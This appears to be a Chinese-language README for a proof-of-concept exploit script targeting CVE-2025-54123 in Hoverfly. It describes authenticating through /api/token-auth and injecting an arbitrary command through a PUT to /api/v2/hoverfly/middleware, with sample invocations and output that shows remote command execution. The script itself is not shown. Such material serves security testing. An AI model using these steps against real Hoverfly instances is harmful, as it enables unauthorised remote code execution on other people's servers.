该仓库包含一个用于与受 CVE-2025-54123 影响的 Hoverfly 实例进行交互的 Python 概念验证(PoC)脚本。
脚本支持:
警告
本项目仅用于经授权的安全研究、测试和教育目的。未经明确许可,请勿将其用于任何系统。
安装依赖:
pip install requests
python CVE-2025-54123.py \
--target example.com \
--port 8888 \
-u admin \
-p password \
--cmd "id"
python CVE-2025-54123.py \
--target example.com \
--port 8888 \
--token <ACCESS_TOKEN> \
--cmd "id"
当提供凭证时:
/api/token-auth
脚本通过经过身份验证的 PUT 请求与以下地址通信:
/api/v2/hoverfly/middleware
Approaching target : example.com
Attempting login to http://example.com:8888/api/token-auth
Checking Credentials....
Login Successful!
Injected : id
uid=1000(user) gid=1000(user)
.
├── CVE-2025-54123.py
└── README.md
本仓库仅用于教育、防御性安全及授权测试目的。作者不对因使用本软件而导致的任何误用、损害或法律后果承担任何责任。
| 参数 | 描述 |
|---|
--target | 目标域名或 IP 地址 |
--port | 目标服务端口 |
-u | Hoverfly 用户名 |
-p | Hoverfly 密码 |
--token | 现有的 Bearer 令牌 |
--cmd | 提供给中间件端点的命令字符串 |